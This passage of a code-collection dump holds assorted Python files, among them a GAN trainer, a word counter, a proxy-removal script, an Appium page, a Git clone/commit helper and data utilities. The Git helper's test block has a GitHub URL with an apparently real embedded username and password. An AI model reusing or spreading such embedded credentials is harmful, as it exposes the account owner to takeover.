train_steps=tfgan.GANTrainSteps(3, 2)))\n\n    gan_estimator.train(lambda: data_provider.provide_data(FLAGS.dataset_dir, shape),\n                        max_steps=FLAGS.max_number_of_steps)\n\n    # Run inference.\n    prediction_iterable = gan_estimator.predict(lambda: tf.random_normal([36, FLAGS.noise_dims]))\n    predictions = [next(prediction_iterable) for _ in range(36)]\n\n    # Nicely tile.\n    image_rows = [np.concatenate(predictions[i:i + 6], axis=0) for i in\n
                  range(0, 36, 6)]\n    tiled_image = np.concatenate(image_rows, axis=1)\n\n    # Write to disk.\n    if not tf.gfile.Exists(FLAGS.eval_dir):\n        tf.gfile.MakeDirs(FLAGS.eval_dir)\n    scipy.misc.imsave(os.path.join(FLAGS.eval_dir, 'gan.png'), tiled_image)\n\n    # save_images_from_events_summaries(output_dir=FLAGS.gen_dir)\n    return 0\n\n\nif __name__ == '__main__':\n    tf.app.run()\n","sub_path":"GANs/magic/Magic_GAN.py","file_name":"Magic_GAN.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"145676054","text":"def read_file(path):\n    with open(path, 'r') as file:\n        t = file.read()\n    return t\n\n\ndef _update_dict(dictionary, key, val):\n    try:\n        dictionary[key] += val\n    except KeyError:\n        if (key is not None) and (len(key) > 0):\n            dictionary[key] = val\n\n\ndef _valid_char(char):\n    if char not in '\" : ; , . - + = / \\ | [ ] { } ( ) * ^ &'.split():\n        return char\n\n\ndef _coalesce(*args):\n    for i in args:\n        if i is not None:\n            return i\n\n\ndef _clean_word(word):\n    word = word.lower()\n    cword = ''.join([_coalesce(_valid_char(c), '') for c in word])\n    return cword\n\n\ndef split_string(string):\n    items = []\n    for item in string.split():\n        for sub in item.split():\n            items.append(sub)\n    return items\n\n\ndef word_count(string):\n    words = {}\n\n    for word in split_string(string):\n        cword = _clean_word(word)\n        _update_dict(words, cword, 1)\n\n    return words\n\nif __name__ == \"__main__\":\n    print(word_count(\"\"))\n    print(word_count(\"Hello\"))\n    print(word_count('Hello, my cat. And my cat doesn\\'t say \"hello\" back.'))\n    print(word_count('This is a test of the emergency broadcast network. This is only a test.'))","sub_path":"applications/word_count/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"357583032","text":"# Thin re-wrapping of requests\nimport requests\n\ndef visit(url, method='post', params=None, data=None, json=None, files=None, **kwargs):\n    res = requests.request(method, url, params=params, data=data, json=json, files=files, **kwargs)\n    try:\n        return res.json()  # return the parsed JSON body\n    except Exception as e:\n        print(\"Response is not valid JSON: {}\".format(e))\n","sub_path":"object/common/handler_request.py","file_name":"handler_request.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"235070361","text":"import os\n\nhome = os.getenv(\"HOME\")\ndefaultEnvText = ('PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games\"')\n\nf = open(home + '/environment', 'w')\nf.write(defaultEnvText + '\\n')\nf.close()\n\nos.system('sudo mv ' + home + '/environment /etc/')\n","sub_path":"Xubuntu_Proxy_Remove.py","file_name":"Xubuntu_Proxy_Remove.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"294887013","text":"from Android.fengzhuang.Android_Function import *\r\nfrom Android.fengzhuang.Android_FatherClass import *\r\nfrom appium.webdriver.common.touch_action import TouchAction\r\n\r\n'''This case adds three monitored apps, then deletes them one by one'''\r\n\r\n\r\n'''Initialize the driver'''\r\npackageName = readConfigInfo('iTest','package')\r\nactivityName = readConfigInfo('iTest','activity')\r\n\r\n'''Locator elements'''\r\nadd_loc = (\"id\",\"iflytek.testTech.propertytool:id/app_icon\")\r\n\r\n# apps on the add page\r\n
Settings\")\r\nsettingClassName = \"android.widget.TextView\"\r\nsystem_loc = (\"name\",\"Android系统\")\r\n# apiDemo_loc = (\"name\",\"Android System WebView\")\r\nkeybord_loc = (\"name\",\"Android 键盘 (AOSP)\")\r\ninputClassName=\"android.widget.EditText\"\r\ninputText=\"请输入需要监控的APP名称\"\r\ninput_loc =(\"name\",\"请输入需要监控的APP名称\")\r\ncomfirm_loc = (\"name\",\"确定\")\r\n#监控应用左边的一支笔符号\r\ndelete_loc = (\"id\",\"iflytek.testTech.propertytool:id/monitor_del_icon\")\r\n\r\n#主页红色删除标签\r\ndel_icon_loc=(\"id\",\"iflytek.testTech.propertytool:id/app_del\")\r\npower_loc=(\"name\",\"电量\")\r\n\r\nif __name__==\"__main__\":\r\n driver = getDriver(packageName,activityName)\r\n f=Father(driver)\r\n f.find_element_loc(power_loc)#等待\"电量\"出现\r\n f.find_element_loc(add_loc).click()#点击 添加图标\r\n f.find_UiSelector_class(settingClassName)#找到Appium Setting\r\n print(\"找打元素Appium Setting\")\r\n f.find_UiSelector_cla_text(inputClassName,inputText)\r\n print(\"找打元素输入框\")","sub_path":"UIAutoTest-master/yoyotest/Android/Page/Page_iTest.py","file_name":"Page_iTest.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462069079","text":"import cv2\n\nimg = cv2.imread(\"1.jpeg\", 0)\n\nret,thr = cv2.threshold(img, 220, 255, cv2.THRESH_BINARY)\ncv2.imshow(\"original\", img)\ncv2.imshow(\"Thresholded\", thr)\ncv2.imwrite(\"thresholded.jpeg\", thr)\nif cv2.waitKey(0) == 27:\n cv2.destroyAllWindows()\n","sub_path":"adaptthreshold.py","file_name":"adaptthreshold.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"164415787","text":"# -*- coding: utf-8 -*-\nfrom time import time\nimport subprocess\nimport re\nimport shlex\n\n\"\"\"\n\tRequires: amixer.\n\n\tCopied from https://github.com/viggee/configi3\n\tModified by tethik.\n\"\"\"\n\nclass Py3status:\n\tdef volume(self, i3s_output_list, i3s_config):\n\t\tdata = subprocess.check_output(['amixer', '-M', '-c', '0', 'sget', 'Master']).decode('utf-8')\n\t\tvolumeobj = re.search(r\"\\[.*%\\]\", data, re.M)\n\t\tvolume = int(volumeobj.group()[1:-2])\n\n\t\tstatus = re.search(r\"\\[on\\]\", data, re.M)\n\t\tif status == None:\n\t\t\tvolumeicon = \" \"\n\t\telse:\n\t\t\tvolumeicon = \" \"\n\t\tvolumestr = volumeicon + \"{:3.0f}\".format(volume) + \"%\"\n\n\t\tresponse = {'full_text': '', 'name': 'volume'}\n\t\tresponse['color'] = \"#268bd2\"\n\t\tresponse['full_text'] = volumestr\n\t\tresponse['cached_until'] = time() + 60\n\t\treturn (0, response)\n\n\tdef on_click(self, i3s_output_list, i3s_config, event):\n\t\tif event['button'] == 1:\n\t\t\tsubprocess.Popen(shlex.split(\"amixer -q set Master toggle\"))\n\t\tif event['button'] == 4:\n\t\t\tsubprocess.Popen(shlex.split(\"amixer -q set Master 5%+ unmute\"))\n\t\tif event['button'] == 5:\n\t\t\tsubprocess.Popen(shlex.split(\"amixer -q set Master 5%- unmute\"))\n\t\tsubprocess.Popen([\"killall\", \"-USR1\", \"py3status\"])\n\nif __name__ == \"__main__\":\n\t\"\"\"\n\tTest this module by calling it directly.\n\t\"\"\"\n\tfrom time import sleep\n\tx = Py3status()\n\tx.on_click(None, [], {'button':1})\n\twhile True:\n\t print(x.volume([], {}))\n\t sleep(1)\n","sub_path":"py3status/modules/interactive_volume.py","file_name":"interactive_volume.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418388391","text":"s1=input(\"Please tell me your name: 
\")\ns2=int(input(\"Please tell me your age: \"))\ns3=\"Hello, {1}. Python is {0} years older than you\"\ns4=\"Hello, {1}. Python is {0} years younger than you\"\ns5=\"Hello, {0}. Python is as old as you\"\na=25\nif int(s2)int(a):\n print(s4.format(int(int(s2)-a),str(s1)))\nif int(s2)==int(a):\n print(s5.format(str(s1)))\n","sub_path":"LEVEL1:Hello,_Friend2.py","file_name":"LEVEL1:Hello,_Friend2.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322492437","text":"import sys\nsys.stdin = open('보급로.txt','r')\ndef pri(board):\n for b in board:\n print(b)\n\nfrom collections import deque\n\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n board = [list(map(int,list(input()))) for _ in range(N)]\n di = [(-1,0),(1,0),(0,1),(0,-1)]\n D = [[0xfffffffff] * N for _ in range(N)]\n Q = deque()\n Q.append((0,0))\n D[0][0] = 0\n while Q:\n y,x = Q.popleft()\n for dy,dx in di:\n ny = y + dy\n nx = x + dx\n if 0 <= ny < N and 0 <= nx < N:\n if D[ny][nx] > D[y][x] + board[ny][nx]:\n D[ny][nx] = D[y][x] + board[ny][nx]\n Q.append((ny,nx))\n print('#{} {}'.format(tc,D[N-1][N-1]))\n \n \n\n","sub_path":"1109/보급로.py","file_name":"보급로.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"105421163","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom src.datasets import DrawDataset, get_train_val_samples\r\nfrom src.transforms import ImageTransform, DrawTransform\r\nimport src.config as config\r\n\r\nimage_size = 256\r\nscale_size = 128\r\nimage_pad = 3\r\nshake = [0, 3, 5, 7]\r\nimage_line_width = 3\r\ntrain_epoch_size = 10_000\r\nnum = 4\r\n\r\nif __name__ == \"__main__\":\r\n _, samples = get_train_val_samples('./data/val_key_ids_003.json', None)\r\n n = len(samples[0])\r\n trns = ImageTransform(True, scale_size)\r\n fig = plt.figure()\r\n for j in range(len(shake)):\r\n draw_transform = DrawTransform(image_size, image_pad, image_line_width, False, shake[j])\r\n dataset = DrawDataset(samples, draw_transform, size=train_epoch_size, image_transform=trns)\r\n loader = DataLoader(dataset, batch_size=n, num_workers=0, shuffle=False)\r\n for img, trg in loader:\r\n c = np.zeros(num)\r\n for i in range(n):\r\n label = trg[i].item()\r\n if (c[label] > 0):\r\n continue\r\n c[label] = 1\r\n ax = fig.add_subplot(len(shake), num, j*num+label+1)\r\n img_i = 1 - img[0][i, :, :, :].numpy().transpose((1,2,0))\r\n if (shake[j]==0):\r\n s = ' no shake'\r\n else:\r\n s = ' shake=' + str(shake[j])\r\n ax.set_title(config.IDX_TO_CLASS[label] + s)\r\n ax.imshow(img_i)\r\n ax.set_axis_off()\r\n if np.prod(c) > 0:\r\n break\r\n plt.show()\r\n","sub_path":"argus-quick-draw-master/comp_shake.py","file_name":"comp_shake.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"71763891","text":"\nfrom trade.util import *\nimport easytrader\n\nDB_NAME = \"seek_alpha\"\nCOLLECTION = \"xueqiu\"\ndb = MongoDB(DB_NAME)\npath = os.getcwd()\nresult_file = open(\"Result.csv\", \"w\")\nfor root, dirs, files in os.walk(path + \"\\logs\\seek_alpha\"):\n for name in files:\n log_name = os.path.join(root, name)\n log = open(log_name)\n for line in log:\n report = {}\n tokens = line.split()\n if len(tokens) == 7:\n time = tokens[0]\n code = tokens[3].split(\":\")[0]\n alpha = 
                alpha = get_four_five(tokens[4].split(\":\")[1], 5)\n                beta = get_four_five(tokens[5].split(\":\")[1], 5)\n                sharp = get_four_five(tokens[6].split(\":\")[1], 5)\n                report[\"time\"] = time\n                report[\"code\"] = code\n                report[\"alpha\"] = alpha\n                report[\"beta\"] = beta\n                report[\"sharp\"] = sharp\n                db.insert_doc(COLLECTION, report)\n# print 1\nfactor_dict = {}\nfor i in db.db[COLLECTION].find():\n    grade = i[\"alpha\"] + i[\"sharp\"]\n    factor_dict[i[\"code\"]] = grade if abs(grade) < 100 else 0\n    # if i[\"alpha\"] > 1 and i[\"sharp\"] > 1:\n    #     result_file.write(i[\"code\"] + \"\\t\" + str(i[\"alpha\"]) + \"\\t\" + str(i[\"sharp\"]) + \"\\n\")\nsorted_list = sorted(factor_dict.items(), key=lambda d: d[1], reverse=True)[:100]\nfor i in sorted_list:\n    result_file.write(str(i) + \"\\n\")\nresult_file.close()\n","sub_path":"test/alpha_db.py","file_name":"alpha_db.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"309530984","text":"# US Natural Gas Production\nimport json\nimport requests\nimport os\n\nurl_eia_production = os.environ.get('EIA_API_NG_PROD')\nurl_database = os.environ.get('LINK_NG_PROD')\ntoken = os.environ.get('PA_API_TOKEN')\n\n# Retrieve Natural Gas production data from EIA website\nurl = url_eia_production\nsource_NatGas = requests.get(url)\n\n# Parse the response into usable JSON\ndata_NatGas = json.loads(source_NatGas.text)\n\n# Update database if needed\n\n# format the date as YYYY-MM\nyear = data_NatGas['series'][0]['data'][0][0][:4]\nmonth = data_NatGas['series'][0]['data'][0][0][4:6]\ncurrent_date = year + '-' + month\n\n# Get the last datapoint from the database\nurl = url_database\ndata = requests.get(url)\nproduction = json.loads(data.text)\nlast_date = production[-1]['date']\n\n# Update the database if current_date != last_date\nif current_date == last_date:\n    print('current_date:', current_date, 'is equal to last_date:', last_date, '- Database not updated')\n\nelse:\n    headers = {'Authorization': token}\n\n    payload = {\n        'date': current_date,\n        'ng_production': data_NatGas['series'][0]['data'][0][1],\n    }\n\n    resp = requests.post(url, headers=headers, data=payload)\n    print(resp)\n","sub_path":"EIA_Production_NG.py","file_name":"EIA_Production_NG.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"36015073","text":"n = int(input(\"Enter Number to calculate sum & average\"))\r\n\r\ntotal = 0  # renamed from 'sum' so the builtin is not shadowed\r\n\r\nfor num in range(1, n + 1):\r\n    total = total + num\r\n\r\naverage = total / n\r\n\r\nprint(\"SUM of\", n, \"numbers is: \", total)\r\nprint(\"Average of\", n, \"natural numbers is: \", average)","sub_path":"Task 3/1).py","file_name":"1).py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"546003746","text":"class Solution:\n    def plusOne(self, digits: 'List[int]') -> 'List[int]':\n        if len(digits) == 0:\n            return digits\n\n        digits[-1] += 1\n        if digits[-1] == 10:\n            digits[-1] = 0\n\n        for i in range(len(digits) - 2, -1, -1):\n            if digits[i + 1] == 0:\n                digits[i] += 1\n                if digits[i] == 10:\n                    digits[i] = 0\n            else:\n                break\n\n        if digits[0] == 0:\n            digits.insert(0, 1)\n\n        return digits\n\ndef main():\n\n    digits = [9, 9]\n\n    sol = Solution()\n    result = sol.plusOne(digits)\n\n    print(result, end='')\n\n    return\n\n\nif __name__ == '__main__':\n
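    # [9, 9] exercises the carry into a new leading digit\n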
main()","sub_path":"#66_plus_one/python/_66_plus_one_py.py","file_name":"_66_plus_one_py.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562414774","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtGui import QPixmap\nfrom UI.start import Ui_MainWindow\nfrom UI.view1 import Ui_Form as view1\nfrom UI.read_result import Ui_read_result\nimport product_registration\nfrom BC_video_copy import csv2dict\nimport numpy as np\nimport cv2\nimport csv\nfrom play_sound import SoundPlayer #階層に注意\nfrom time import sleep\nfrom pyzbar.pyzbar import decode\nfrom PIL import Image\n\n\nclass StartWindow(QtWidgets.QMainWindow):\n def __init__(self,parent=None):\n super(StartWindow, self).__init__(parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n def keyPressEvent(self, e):\n # Enterを押すとバーコード読み取り画面が現れる\n #print(e)\n #print(e.key())\n if e.key() == 16777220:\n view_1.show()\n self.hide()\n elif e.key() == Qt.Key_Escape:\n product_registration.add_main()\n #self.close()\n\nclass View1(QtWidgets.QWidget):\n def __init__(self,parent=None):\n super(View1, self).__init__(parent)\n self.ui = view1()\n self.ui.setupUi(self)\n self.table_items =[]\n def keyPressEvent(self, e):\n # エスケープキーを押すと画面が閉じる\n if e.key() == 16777220:\n self.register_main()\n elif e.key() == Qt.Key_Escape:\n self.close()\n\n def register_main(self):\n data = read_BC()\n if len(data) == 0:\n print(\"バーコードが読み取れていない!!!!\") # 例外処理について後で考える!\n bc_num = data[0][0].decode('utf-8', 'ignore') if data[0][0].decode('utf-8', 'ignore') in dict_names.keys() else \"その他\"\n self.table_items.append(bc_num)\n name_c, price_c = dict_names[bc_num], dict_prices[bc_num]\n print(name_c, price_c)\n read_result.draw_result(name_c, price_c)\n read_result.show()\n self.hide()\n\n\n\n\nclass ReadResult(QtWidgets.QMainWindow):\n def __init__(self,parent=None):\n super(ReadResult, self).__init__(parent)\n self.ui = Ui_read_result()\n self.ui.setupUi(self)\n def keyPressEvent(self, e):\n # Enterを押すとバーコード読み取り画面が現れる\n if e.key() == 16777220:\n view_1.show()\n self.hide()\n\n def draw_result(self, name, price):\n self.ui.label.setText(name)\n self.ui.label_2.setText(str(price)+\"RWF\")\n\n\n\ndef read_BC(window=None, camera=0):\n # VideoCaptureのインスタンスを作成する。\n # 引数でカメラを選べれる。\n cap = cv2.VideoCapture(camera)\n #cap.set(cv2.CAP_PROP_FRAME_WIDTH, 50) # カメラ画像の横幅を250に設定\n #cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 50) # カメラ画像の縦幅を250に設定\n\n if cap.isOpened() is False:\n print(\"can not open camera\")\n sys.exit()\n\n while True:\n # VideoCaptureから1フレーム読み込む\n ret, frame = cap.read()\n\n # バーコードの読取り\n data = decode(frame)\n\n #ウィンドウの中でカメラの映像を表示したい\n #img_res = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n #img_res = cv2.resize(img_res, (250, 250))\n #qt_img = create_QPixmap(img_res)\n #window.ui.label_setPix.setPixmap(qt_img)\n #cv2.imshow('frame', frame)\n if len(data) != 0:\n #読み取れたらwhileから抜ける\n break\n\n # キー入力を1ms待って、キーが'q'だったらBreakする\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n return data\n\n\n\nif __name__ == '__main__':\n #商品の辞書をロードする\n dict_names, dict_prices = csv2dict('names_prices/BC_info.csv')\n app = QtWidgets.QApplication(sys.argv)\n start_window = StartWindow()\n view_1 = View1()\n read_result = ReadResult()\n start_window.show()\n 
    sys.exit(app.exec_())","sub_path":"Self_cash_register_BC/old/start_ui.py","file_name":"start_ui.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"521874726","text":"import numpy as np\r\nimport os\r\nfrom glob import glob\r\nimport os.path as osp\r\nfrom PIL import Image\r\n\r\nclass roadDamageDataset():\r\n\r\n    def __init__(self, imagesFolderPath, labelsFolderPath):\r\n        self.images_root = imagesFolderPath\r\n        self.labels_root = labelsFolderPath\r\n\r\n    def load_data(self):\r\n        img = []\r\n        lbl = []\r\n        labelsFolder = self.labels_root\r\n        imagesFolder = self.images_root\r\n        listOfFiles = os.listdir(labelsFolder)\r\n\r\n        for l in listOfFiles:\r\n            outputFolder = labelsFolder + \"/\" + l\r\n            inputFolder = imagesFolder + \"/\" + l\r\n            if os.path.isdir(outputFolder):\r\n                for label_file in glob(osp.join(outputFolder, '*.png')):\r\n                    with open(label_file) as f:\r\n                        base = osp.splitext(osp.basename(label_file))[0]\r\n                        img_file = osp.join(inputFolder, base + '.png')\r\n                        if os.path.isfile(img_file):\r\n                            lbl.append(np.asarray(Image.open(f.name)))\r\n                            img.append(np.asarray(Image.open(img_file)))\r\n\r\n        return np.asarray(img), np.asarray(lbl)\r\n","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"344663547","text":"\"\"\"Converts distances between unit types\"\"\"\n\n# 1. Define\n\n\ndef prompt_for_data():\n    \"\"\" take in user strings and output usable variables \"\"\"\n    starting_unit = input('Hello. I am a program that converts distances. What is ' +\n                          'your starting unit of measurement?' +\n                          ' Please input; mi, km, ft or m. ')\n    distance_in_starting_unit = float(input('What is your distance amount? '))\n    output_unit = input('What is your end unit, please input; mi, km, ft or m ? ')\n    user_input_list = []\n    user_input_list += [starting_unit, distance_in_starting_unit, output_unit]\n    return user_input_list\n\ndef convert_to_meters(distance_information):\n    \"\"\"Pull the starting unit from the list and convert the distance to meters.\"\"\"\n    MI_TO_M = 1609.34\n    KM_TO_M = 1000\n    FT_TO_M = 0.3048\n    starting_unit = distance_information[0]\n    distance_in_starting_unit = distance_information[1]\n    if starting_unit == 'mi':\n        distance_in_converted_unit = MI_TO_M * distance_in_starting_unit\n    elif starting_unit == 'km':\n        distance_in_converted_unit = KM_TO_M * distance_in_starting_unit\n    elif starting_unit == 'ft':\n        distance_in_converted_unit = FT_TO_M * distance_in_starting_unit\n    else:\n        distance_in_converted_unit = distance_in_starting_unit\n    return distance_in_converted_unit\n\ndef convert_to_output_distance(distance_information, distance_in_meters):\n    MI_TO_M = 1609.34\n    KM_TO_M = 1000\n    FT_TO_M = 0.3048\n    output_unit = distance_information[2]\n    if output_unit == 'mi':\n        distance_in_output_unit = distance_in_meters / MI_TO_M\n    elif output_unit == 'km':\n        distance_in_output_unit = distance_in_meters / KM_TO_M\n    elif output_unit == 'ft':\n        distance_in_output_unit = distance_in_meters / FT_TO_M\n    else:\n        distance_in_output_unit = distance_in_meters\n    return distance_in_output_unit\n
\n# 2. Main\n\n\ndef main():\n\n    distance_information = prompt_for_data()\n    distance_in_meters = convert_to_meters(distance_information)\n    output_distance = convert_to_output_distance(distance_information, distance_in_meters)\n    output = str(output_distance)\n    print('Output: ' + output)\n    return output\n\nmain()\n","sub_path":"practice/distance-converter.py","file_name":"distance-converter.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"214453473","text":"# -*- coding:utf-8 -*-\nimport os\nimport git\n\nfrom utils.file import remove_dir, mk_dirs\nimport shutil\nfrom utils.mylogger import getlogger\n\nlog = getlogger(__name__)\n\n\ndef remote_clone(app, url):\n    \"\"\"\n    git.clone_from\n    return True/False and info\n    \"\"\"\n\n    newdir = url.split('/')[-1].split('.')[0]\n    to_path = os.path.join(app.config['AUTO_TEMP'], newdir)\n    remove_dir(to_path) if os.path.exists(to_path) else None\n    mk_dirs(to_path)\n\n    try:\n        repo = git.Repo.clone_from(url, to_path)\n    except git.exc.GitError as e:\n        log.error(\"Git clone from {} to {} failed: {}\".format(url, to_path, e))\n        log.info(\"{}\".format(e))\n        return (False, \"{}\".format(e))\n\n    log.info(\"Cloned {} to {} successfully\".format(url, to_path))\n\n    projectfile = os.path.join(to_path, 'platforminterface/project.conf')\n    log.info(\"Reading project file: {}\".format(projectfile))\n    if os.path.exists(projectfile):\n        with open(projectfile, 'r') as f:\n            for l in f:\n                if l.startswith('#'):\n                    continue\n                if len(l.strip()) == 0:\n                    continue\n                splits = l.strip().split('|')\n                if len(splits) != 4:\n                    log.error(\"Bad project.conf line \" + l)\n                    return (False, \"Bad project.conf line \" + l)\n                (projectname, owner, users, cron) = splits\n                project_path = os.path.join(\n                    app.config['AUTO_HOME'], 'workspace', owner, projectname)\n                if os.path.exists(project_path):\n                    msg = 'Target directory already exists: {}'.format(project_path)\n                    log.error(msg)\n                    return (False, msg)\n                log.info(\"Copying files from {} to {}\".format(to_path, project_path))\n                try:\n                    shutil.copytree(to_path, project_path)\n                except Exception as e:\n                    return (False, \"{}\".format(e))\n    else:\n        msg = \"Load Project Fail: project.conf not found: {}\".format(projectfile)\n        log.error(msg)\n        return (False, msg)\n\n    return (True, project_path) if repo else (False, \"Git clone fail!\")\n\n\ndef remote_clone_BAK(url, localpath):\n    \"\"\"\n    git.clone_from\n    return True/False and info\n    \"\"\"\n\n    newdir = url.split('/')[-1].split('.')[0]\n    to_path = os.path.join(localpath, newdir)\n    if os.path.exists(to_path):\n        errinfo = \"Path {} already exists; delete it first!\".format(newdir)\n        log.error(\"remote_clone: \" + to_path + \" directory already exists!\")\n        return (False, errinfo)\n\n    os.mkdir(to_path)\n\n    try:\n        repo = git.Repo.clone_from(url, to_path)\n    except git.exc.GitError as e:\n        log.error(\"Git clone from {} to {} failed: {}\".format(url, localpath, e))\n        log.info(\"{}\".format(e))\n        return (False, \"{}\".format(e))\n\n    return (True, to_path) if repo else (False, \"fail\")\n\n\ndef is_gitdir(dir):\n\n    try:\n        repo = git.Repo(dir)\n    except git.exc.InvalidGitRepositoryError:\n        return False\n\n    return True\n\n\ndef commit(dir):\n    \"\"\"\n    git.commit\n    \"\"\"\n    try:\n        repo = git.Repo(dir)\n    except git.exc.InvalidGitRepositoryError as e:\n        log.error(\"Directory {} is not a git repository! {}\".format(dir, e))\n        log.info(\"{}\".format(e))\n        return False, \"{}\".format(e)\n\n    for f in repo.untracked_files:\n        repo.index.add([f])\n        repo.index.commit(\"Add file:\" + f)\n
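    # note: repo.commit('master') below only resolves the rev to a Commit object; the index commits above do the real work\n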
    try:\n        repo.commit(\"master\")\n    except Exception as e:\n        log.error(\"commit {} failed. {}\".format(dir, e))\n        log.info(\"{}\".format(e))\n        return False, \"{}\".format(e)\n\n    return True, \"success\"\n\n\ndef push(dir):\n\n    log.info(\"Commit before push ...\")\n\n    ok, info = commit(dir)\n    if not ok:\n        return False, info\n\n    remote = git.Repo(dir).remote()\n\n    try:\n        remote.push(\"origin\")\n    except Exception as e:\n        log.error(\"Push dir {} failed:{}\".format(dir, e))\n        log.info(\"{}\".format(e))\n        return False, \"{}\".format(e)\n\n    return True, \"success\"\n\n\nif __name__ == '__main__':\n\n    url1 = \"https://github.com/mawentao119/robotframework-metrics.git\"\n    url = \"https://mawentao119:mwt\\\\@Github1@github.com/mawentao119/robotframework-metrics.git\"\n\n    path = \"temp1234\"\n    remove_dir(path) if os.path.exists(path) else None\n    os.mkdir(path)\n\n    remote_clone_BAK(url1, path)  # the new remote_clone expects a Flask app, so the self-test uses the old entry point\n    open(\"temp1234/robotframework-metrics/123.txt\", 'w').close()\n    commit(path + '/' + \"robotframework-metrics\")\n\n    print(is_gitdir(\"temp1234\"))\n    remove_dir(path)\n\n    #from utils.dbclass import TestDB\n    #myDB = TestDB('/Users/tester/PycharmProjects/uniRobotDev/.beats')\n","sub_path":"utils/gitit.py","file_name":"gitit.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"583339188","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom math import *\nx = np.arange(-pi, pi, 0.001)\nx = list(x)\ny = []\nfor i in x:\n    y.append(sin(i))\n\nplt.plot(x, y)\nplt.show()","sub_path":"sine_wave.py","file_name":"sine_wave.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"301700625","text":"f = open(r'..\\editor.py', mode='r', encoding='utf8')\r\ncontent = f.readlines()\r\nf.close()\r\n\r\nclass Class:\r\n    def __init__(self, name):\r\n        self.name = name\r\n        self.methods = {}\r\n\r\nclass Method:\r\n    def __init__(self, name):\r\n        self.name = name\r\n        self.calls = []\r\n\r\nlast_class = None\r\nclasses = {}\r\nmethods = {}\r\n\r\nfor raw in content:\r\n    line = raw.strip()\r\n    if line.startswith('class') and line.endswith(':'):\r\n        name = line[6:-1]\r\n        classes[name] = Class(name)\r\n        last_class = name\r\n    elif line.startswith('def') and line.endswith(':'):\r\n        name = line[4:-1]\r\n        if raw.startswith(' ') and last_class is not None:\r\n            classes[last_class].methods[name] = Method(name)\r\n        else:\r\n            methods[name] = Method(name)\r\n\r\n#for line in content:\r\n#    if line.index('(') != -1:\r\n#        print(line)\r\n\r\nprint('Classes:\\n')\r\n\r\nfor cname in classes:\r\n    c = classes[cname]\r\n    print('  class', c.name, 'with', len(c.methods), 'methods.')\r\n    for m in c.methods:\r\n        print('    ', m)\r\n\r\nprint(f'\\nNumber of classes: {len(classes)}\\n')\r\n\r\nprint('Free Methods:\\n')\r\n\r\nfor m in methods:\r\n    print('  ', m)\r\n\r\nprint(f'\\nNumber of free methods: {len(methods)}\\n')\r\n","sub_path":"teddypy/qa/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"128468911","text":"import matplotlib as mpl\nmpl.use('pgf')\nimport numpy as np\nimport scipy.constants as const\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom uncertainties import ufloat\nimport uncertainties.unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nmpl.rcParams.update({\n    'font.family': 'serif',\n    'text.usetex': True,\n    'pgf.rcfonts': False,\n    'pgf.texsystem': 'lualatex',\n
